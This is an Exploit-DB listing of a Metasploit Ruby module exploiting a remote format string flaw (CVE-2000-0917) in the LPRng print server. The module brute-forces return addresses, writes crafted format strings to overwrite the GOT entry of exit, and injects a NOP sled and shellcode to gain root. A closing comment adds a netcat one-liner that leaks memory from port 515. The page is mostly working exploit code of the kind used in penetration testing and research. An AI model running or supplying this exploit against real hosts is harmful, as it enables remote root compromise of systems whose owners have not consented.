LPRng - use_syslog Remote Format String (Metasploit)

EDB-ID:

16842

CVE:

2000-0917

EDB Verified:

Author:

Metasploit

Type:

remote

Exploit:   /  

Platform:

Linux

Date:

2010-07-03

Vulnerable App: 
##
# $Id: lprng_format_string.rb 9666 2010-07-03 01:09:32Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Brute
	include Msf::Exploit::FormatString

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'LPRng use_syslog Remote Format String Vulnerability',
			'Description'    => %q{
					This module exploits a format string vulnerability in the LPRng print server.
				This vulnerability was discovered by Chris Evans. There was a publicly
				circulating worm targeting this vulnerability, which prompted RedHat to pull
				their 7.0 release. They consequently re-released it as "7.0-respin".
			},
			'Author'         => [ 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9666 $',
			'References'     =>
				[
					[ 'CVE', '2000-0917' ],
					[ 'OSVDB', '421' ],
					[ 'BID', '1712' ],
					[ 'US-CERT-VU', '382365' ],
					[ 'URL', 'http://www.cert.org/advisories/CA-2000-22.html' ],
					[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=17756' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/226' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/227' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/230' ]
				],
			'Platform'       => 'linux',
			'Arch'           => ARCH_X86,
			'Privileged'     => true, # root
			'DefaultOptions' =>
				{
					'PrependSetresuid' => true
				},
			'Payload'        =>
				{
					'Space'    => 130, # buffer size on caldera is 180! (need ~50 for fmt)
					'BadChars' => "\x00\x0a\x20\x25",
				},
			'Targets'        =>
				[
					# tested OK - jjd
					[ 'Caldera OpenLinux 2.3 Bruteforce',
						{
							'Platform'   => 'linux',
							'NumPops'    => 243,
							'FlowHook'   => 0x80992d4,  # GOT of exit
							# (0x809c180+(41+4+10+48)) - data segment, but gets corrupted
							'Bruteforce' =>
								{
									'Start' => { 'Ret' => 0xcffffff4 },
									'Stop'  => { 'Ret' => 0x7fffe004 },
									'Step'  => 16
								}
						}
					],
=begin
					# untested (from public exploits)
					[ 'Slackware 7.0 LPRng-3.6.22.tgz - started from shell',
						{
							'NumPops' 	=> 299,
							'Ret' 	   => 0xbffff640,
							'FlowHook'	=> 0xbfffee30
						}
					],
					[ 'RedHat 7.0 (Guinness) with LPRng-3.6.22/23/24-1 from rpm - glibc-2.2-5',
						{
							'NumPops' 	=> 304,
							'Ret' 	   => 0xbffff920,
							'FlowHook'	=> 0xbffff0f0
						}
					],
					[ 'RedHat 7.0 - Guinesss',
						{
							'NumPops' 	=> 300,
							'Ret' 	   => 0x41424344,
							'FlowHook'	=> 0xbffff3ec
						}
					],
					[ 'RedHat 7.0 - Guinesss-dev',
						{
							'NumPops' 	=> 300,
							'Ret' 	   => 0x41424344,
							'FlowHook'	=> 0xbffff12c
						}
					],
=end
					# ...
					[ 'Debug',
						{
							'NumPops' 	=> 1, # sure to miss.
							'Ret' 	   => 0x41424344,
							'FlowHook'	=> 0x45464748
						}
					]
				],
			# 'DefaultTarget' => 0,
			'DisclosureDate' => 'Sep 25 2000'))

		register_options( [ Opt::RPORT(515) ], self.class )
	end


	def exploit
		# we want to use DPA for this one :)
		fmtstr_set_caps(false, true)

		# check syslog to see which number hits 41414141
=begin
		400.times { |x|
			connect
			buf = "aAAAABBBB|%%%u$x|%u\n" % [x+1, x+1]
			sock.put(buf)
			#handler
			disconnect
		}
=end
		print_status("Trying target #{target.name} ..")

		super
	end


	def brute_exploit(addrs)

		#print_status("Trying target #{target.name} - addr 0x%x..." % addrs['Ret'])

		printed = "Service_connection: bad request line '\\35" # + "'XXXYYYYZZZZ...
		num_start = printed.length + 2 + 4

		# write 'ret' addr to flowhook (execute shellcode)
		# NOTE: the resulting two writes must be done at the same time

		# characters (chr(10) > X > chr(99)) will screw up alignment (\XXX in syslog)
		fmtbuf = "_" * 4
		fmtbuf << generate_fmt_two_shorts(num_start, target['FlowHook'], addrs['Ret'])
		#print_status(" hijacker format string buffer is #{fmtbuf.length} bytes")

		# append payload and newline
		#fmtbuf << payload.encoded
		fmtbuf << "\x90" * 32
		fmtbuf << Rex::Text.charset_exclude(payload_badchars)
		fmtbuf << "\n"

		print_status(" writing 0x%x to 0x%x" % [addrs['Ret'], target['FlowHook']])

		connect
		#print_status("Sleeping, attach now!!")
		#select(nil,nil,nil,5)

		sock.put(fmtbuf)

		handler
		disconnect

	end

end


=begin

HRM!

The following causes info leakage!

bash$ ( ruby -e 'puts "\x09" + ("%x" * 50) + "\n"'; cat) | nc 192.168.0.120 515 | hexdump -vC

There are various other ways to trigger the vulnerability. LPD uses the single-byte commands
0x01 -> 0x09...

It's unclear if there is a way to auto-detect the lpd version via LPD commands.

=end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services